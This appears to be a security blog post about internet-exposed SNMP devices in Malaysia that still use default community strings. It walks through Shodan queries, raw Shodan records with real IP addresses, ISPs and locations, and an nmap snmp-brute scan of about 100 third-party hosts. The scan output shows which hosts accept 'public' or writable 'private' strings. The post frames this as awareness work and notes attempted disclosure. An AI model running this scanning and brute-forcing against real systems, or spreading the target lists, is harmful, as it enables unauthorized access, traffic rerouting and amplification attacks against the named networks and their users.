Introduction
The SNMP protocol is pretty much used for monitoring device system resources such as traffic utilization, uptime, OS or firmware version, processes, interface speed, etc. By default is listens on port 161/udp. It's an old protocol but still widely used to monitor traffic utilization, primarily on routers & switches. What I had stumbled upon is how many of these devices are easily exposed on the Internet with default community strings. Some belong to major ISPs. These devices handle Gigabits of traffic! Exploiting such devices are like taking candy from a child. Hackers could use it to launch amplification attacks, reroute traffic or take down Internet gateways.
Identification
The following are steps to identify these devices. I use Shodan command-line interface and Nmap NSE script.
1. Using Shodan to find open SNMP ports 161/UDP:
$ shodan download --limit 100 shodan-api-snmp.txt port:161 country:my
Search query: port:161 country:my
Total number of results: 9025
Query credits left: 92
Output file: shodan-api-snmp.txt.json.gz
[###################################-] 99% 00:00:01
Saved 100 results into file shodan-api-snmp.txt.json.gz
gr00t@adam:~/Downloads/snmp$ zcat shodan-api-snmp.txt.json.gz
{"_shodan": {"id": "5537b198-2081-4304-b4d6-4a39fa55cb2b", "options": {}, "ptr": true, "module": "snmp", "crawler": "70752434fdf0dcec35df6ae02b9703eaae035f7d"}, "hash": -1924632222, "os": null, "opts": {"raw": "30818202010004067075626c6963a275020466b16a5e0201000201003067306506082b06010201010100045942495041432d383530302e20482f573a20534844534c20284f72696f6e292076312e3030202f2048653130302f327878204353502076322e3320462f573a20352e35326831202831312053657074656d626572203230303729"}, "ip": 3680329889, "isp": "TM Net", "snmp": {"contact": "not set", "location": "not set", "name": "", "description": "BIPAC-8500. H/W: SHDSL (Orion) v1.00 / He100/2xx CSP v2.3 F/W: 5.52h1 (11 September 2007)"}, "port": 161, "hostnames": [], "location": {"city": "Alor Gajah", "region_code": "04", "area_code": null, "longitude": 102.20890000000003, "country_code3": "MYS", "country_name": "Malaysia", "postal_code": "78009", "dma_code": null, "country_code": "MY", "latitude": 2.3804000000000087}, "timestamp": "2019-03-23T07:31:41.164982", "domains": [], "org": "TM Net", "data": "BIPAC-8500. H/W: SHDSL (Orion) v1.00 / He100/2xx CSP v2.3 F/W: 5.52h1 (11 September 2007)", "asn": "AS4788", "transport": "udp", "ip_str": "219.93.96.161"}
{"_shodan": {"id": "9a89e29e-b932-4f36-9109-e232de48fa7f", "options": {}, "ptr": true, "module": "snmp", "crawler": "d264629436af1b777b3b513ca6ed1404d7395d80"}, "hash": 1282871131, "os": null, "opts": {"raw": "304802010004067075626c6963a23b020466b16a5e020100020100302d302b06082b06010201010100041f576972656c657373204e2047504f4e20726f75746572207769746820555342"}, "ip": 1743414711, "isp": "No.31-A, Jalan Tiara, Tiara Square", "snmp": {"contact": "", "location": "Taiwan", "name": "PMG5317-T20A", "description": "Wireless N GPON router with USB"}, "port": 161, "hostnames": [], "location": {"city": "Kuala Lumpur", "region_code": "14", "area_code": null, "longitude": 101.6757, "country_code3": "MYS", "country_name": "Malaysia", "postal_code": "59200", "dma_code": null, "country_code": "MY", "latitude": 3.1185000000000116}, "timestamp": "2019-03-23T09:51:25.626046", "domains": [], "org": "No.31-A, Jalan Tiara, Tiara Square", "data": "Wireless N GPON router with USB", "asn": "AS132435", "transport": "udp", "ip_str": "103.234.101.183"}
{"_shodan": {"id": "e5b20f51-0bb7-43d5-82a4-3250e41808d5", "options": {}, "ptr": true, "module": "snmp", "crawler": "d264629436af1b777b3b513ca6ed1404d7395d80"}, "hash": -625139007, "os": null, "opts": {"raw": "304302010004067075626c6963a236020466b16a5e0201000201003028302606082b06010201010100041a526f757465724f5320434352313030392d37472d31432d31532b"}, "ip": 762700881, "isp": "E-world Communication Sdn Bhd", "snmp": {"contact": "", "location": "", "name": "Empire-SVR-Eworld", "description": "RouterOS CCR1009-7G-1C-1S+"}, "port": 161, "hostnames": [], "location": {"city": null, "region_code": null, "area_code": null, "longitude": 112.5, "country_code3": "MYS", "country_name": "Malaysia", "postal_code": null, "dma_code": null, "country_code": "MY", "latitude": 2.5}, "timestamp": "2019-03-23T09:47:30.036767", "domains": [], "org": "E-world Communication Sdn Bhd", "data": "RouterOS CCR1009-7G-1C-1S+", "asn": "AS134202", "transport": "udp", "ip_str": "45.117.228.81"}
{"_shodan": {"id": "771922cf-312e-4031-aa4a-af85290ccd78", "options": {}, "ptr": true, "module": "snmp", "crawler": "97b9d37f0484f45ce645307121c5c1ce0b3db578"}, "hash": -1001072405, "os": null, "opts": {"raw": "304602010004067075626c6963a239020466b16a5e020100020100302b302906082b06010201010100041d48502045544845524e4554204d554c54492d454e5649524f4e4d454e54"}, "ip": 717158293, "isp": "TM Net", "snmp": {"contact": "", "location": "", "name": "HP38F83B", "description": "HP ETHERNET MULTI-ENVIRONMENT"}, "port": 161, "hostnames": [], "location": {"city": "Kuala Lumpur", "region_code": "14", "area_code": null, "longitude": 101.73340000000002, "country_code3": "MYS", "country_name": "Malaysia", "postal_code": "54200", "dma_code": null, "country_code": "MY", "latitude": 3.1728999999999985}, "timestamp": "2019-03-23T09:36:25.155848", "domains": [], "org": "TM Net", "data": "HP ETHERNET MULTI-ENVIRONMENT", "asn": "AS4788", "transport": "udp", "ip_str": "42.190.247.149"}
{"_shodan": {"id": "77f8ef04-bd1c-4eaf-984b-e59ff45efe42", "options": {}, "ptr": true, "module": "snmp", "crawler": "70752434fdf0dcec35df6ae02b9703eaae035f7d"}, "hash": -1235570117, "os": null, "opts": {"raw": "3082004302010004067075626c6963a2820034020466b16a5e020100020100308200243082002006082b060102010101000414573334303056362d342e30364c2e30326a2d544d"}, "ip": 1009984985, "isp": "TM Net", "snmp": {"contact": "unknown", "location": "unknown", "name": "Innacomm", "description": "W3400V6-4.06L.02j-TM"}, "port": 161, "hostnames": [], "location": {"city": "Subang Jaya", "region_code": "12", "area_code": null, "longitude": 101.57119999999998, "country_code3": "MYS", "country_name": "Malaysia", "postal_code": "47600", "dma_code": null, "country_code": "MY", "latitude": 3.047300000000007}, "timestamp": "2019-03-23T10:30:20.120908", "domains": [], "org": "TM Net", "data": "W3400V6-4.06L.02j-TM", "asn": "AS4788", "transport": "udp", "ip_str": "60.51.37.217"}
{"_shodan": {"id": "c397faef-119c-4b8f-ad26-3a5cb8c7d041", "options": {}, "ptr": true, "module": "snmp", "crawler": "d264629436af1b777b3b513ca6ed1404d7395d80"}, "hash": 440659073, "os": null, "opts": {"raw": "3082003602010004067075626c6963a2820027020466b16a5e020100020100308200173082001306082b06010201010100040747455f312e3037"}, "ip": 1938119429, "isp": "TM Net", "snmp": {"contact": "D-Link", "location": "D-Link_DRS", "name": "DSL-2640B", "description": "GE_1.07"}, "port": 161, "hostnames": [], "location": {"city": "Kulai", "region_code": "01", "area_code": null, "longitude": 103.50110000000001, "country_code3": "MYS", "country_name": "Malaysia", "postal_code": "81000", "dma_code": null, "country_code": "MY", "latitude": 1.7258999999999958}, "timestamp": "2019-03-23T09:24:55.056330", "domains": [], "org": "TM Net", "data": "GE_1.07", "asn": "AS4788", "transport": "udp", "ip_str": "115.133.91.5"}
<SNIP>
2. Let's parse the json output into a single file:
$ shodan parse --fields ip_str shodan-api-snmp.txt.json.gz > targets.txt
$ cat targets.txt
219.93.96.161
103.234.101.183
45.117.228.81
42.190.247.149
60.51.37.217
115.133.91.5
210.19.179.86
121.122.166.97
113.23.179.42
103.61.127.245
1.32.80.202
182.54.207.75
103.17.19.202
120.138.81.35
175.140.15.124
115.135.244.248
42.1.62.96
219.93.64.141
210.48.146.83
175.141.79.16
113.23.212.106
60.54.109.118
175.142.123.117
1.32.62.0
1.32.90.160
115.134.8.170
58.26.91.82
175.139.6.34
175.141.78.76
103.47.253.101
115.135.132.10
175.140.191.30
60.54.83.34
103.220.5.9
124.82.71.180
60.50.161.155
175.140.58.66
219.93.121.26
110.4.40.111
110.159.66.68
182.54.209.62
<SNIP>
3. Now, use Nmap with NSE script snmp-brute to identify community default strings:
$ sudo nmap -iL targets.txt --script snmp-brute -p 161 -sU
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-23 20:07 +08
Nmap scan report for 219.93.96.161
Host is up (0.096s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 103.234.101.183
Host is up (0.021s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
Nmap scan report for 45.117.228.81
Host is up (0.027s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 42.190.247.149
Host is up (3.0s latency).
PORT STATE SERVICE
161/udp filtered snmp
Nmap scan report for 60.51.37.217
Host is up (0.030s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 115.133.91.5
Host is up (0.062s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 210.19.179.86
Host is up (0.011s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
<SNIP>
Nmap scan report for 103.17.19.202
Host is up (0.046s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
| <empty> - Valid credentials
|_ public - Valid credentials
Nmap scan report for 120.138.81.35
Host is up (0.012s latency).
PORT STATE SERVICE
161/udp open|filtered snmp
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
Nmap scan report for 175.140.15.124
Host is up (0.034s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 115.135.244.248
Host is up (0.040s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for cloud.eagleicvr.my (42.1.62.96)
Host is up (0.011s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 219.93.64.141
Host is up (0.059s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for automatchtask.company (210.48.146.83)
Host is up (0.012s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 175.141.79.16
Host is up (0.052s latency).
PORT STATE SERVICE
161/udp closed snmp
<SNIP>
Nmap scan report for 1.32.90.160
Host is up (0.040s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 115.134.8.170
Host is up (0.051s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 58.26.91.82
Host is up (0.011s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 175.139.6.34
Host is up (0.031s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 175.141.78.76
Host is up (0.042s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 103.47.253.101
Host is up (0.0095s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
<SNIP>
Nmap scan report for 124.82.71.180
Host is up (0.045s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 155.161.50.60.kbu01-home.tm.net.my (60.50.161.155)
Host is up (0.013s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
Nmap scan report for san-121-26.tm.net.my (219.93.121.26)
Host is up (0.19s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 110.4.40.111
Host is up (0.010s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 110.159.66.68
Host is up (0.023s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 182.54.209.62
Host is up (0.017s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
<SNIP ----- SNIP>
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 118.101.48.84
Host is up (0.016s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 183.171.225.98
Host is up (0.034s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 203.142.40.204
Host is up (0.021s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
Nmap scan report for mail.yunnamhc.com.my (221.133.35.75)
Host is up (0.011s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 1.32.86.122
Host is up (0.018s latency).
PORT STATE SERVICE
161/udp open|filtered snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 219.94.13.154
Host is up (0.014s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 60.51.66.36
Host is up (0.037s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 115.135.244.190
Host is up (0.031s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 115.132.33.5
Host is up (0.065s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 121.120.14.52
Host is up (0.99s latency).
PORT STATE SERVICE
161/udp open|filtered snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for access-intel-the.realalive.com (202.75.63.190)
Host is up (0.013s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 103.234.100.95
Host is up (0.021s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
Nmap scan report for 118.100.56.74
Host is up (0.019s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 60.48.27.223
Host is up (0.013s latency).
PORT STATE SERVICE
161/udp open|filtered snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 203.106.189.15
Host is up (0.055s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 1.9.76.70
Host is up (0.019s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
<SNIP>
Nmap scan report for 221.133.41.188
Host is up (0.013s latency).
PORT STATE SERVICE
161/udp open|filtered snmp
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
Nmap scan report for 60.53.226.251
Host is up (0.017s latency).
PORT STATE SERVICE
161/udp open|filtered snmp
| snmp-brute:
|_ public - Valid credentials
Nmap done: 100 IP addresses (88 hosts up) scanned in 59.20 seconds
4. Results with valid credentials for private means anyone can write to it. Some of these devices belong to small corporations or home users, but if you look carefully, sometimes you can find routers belonging to ISPs. From here, it's pretty much up to the hackers carnal desire on how he wish to exploit it. As usual, I do not condone any illegal activity such as unauthorized intrusion or modification or misuse to computers that you do not have explicit consent. I have tried on numerous occasions to reach out to warn them about this flaw.
Summary
This flaw might sound trivial to some, but for someone seeking malice, it could easily be turned into a weapon. The fault is lack of awareness on simple Cyber security hygiene. Often, simple mistakes make for easy pickings for hackers. It is only human to find quick and easy ways into an adversary network. While corporations spend millions in procuring the greatest security to protect their crown assets, the simplest solutions are often forgotten. I will be presenting my findings at Rawsec meetup #3, 2019. My slides will be up shortly.
No comments:
Post a Comment